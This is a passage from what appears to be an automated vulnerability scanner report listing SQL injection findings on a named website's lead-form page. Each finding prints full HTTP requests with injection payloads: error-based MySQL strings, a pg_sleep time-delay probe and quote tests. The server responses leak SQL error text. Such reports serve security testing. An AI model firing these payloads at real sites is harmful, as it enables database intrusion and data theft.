Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:31:06 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
card&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=i' at line 5

1.71. http://www.insideup.com/ppc/leadflow/bulo00/project.php [subcategoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The subcategoryId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the subcategoryId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005'&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:45:18 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005''&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:45:18 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.72. http://www.insideup.com/ppc/leadflow/bulo00/project.php [website parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The website parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the website parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa'&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:45:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa''&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:45:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.73. http://www.insideup.com/ppc/leadflow/bulo00/project.php [website parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The website parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the website parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa'&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:31:38 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
card&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=i' at line 5

1.74. http://www.insideup.com/ppc/leadflow/bulo00/project.php [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The zip parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zip parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:45:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:45:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.75. http://www.insideup.com/ppc/leadflow/bulo00/project.php [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The zip parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the zip parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
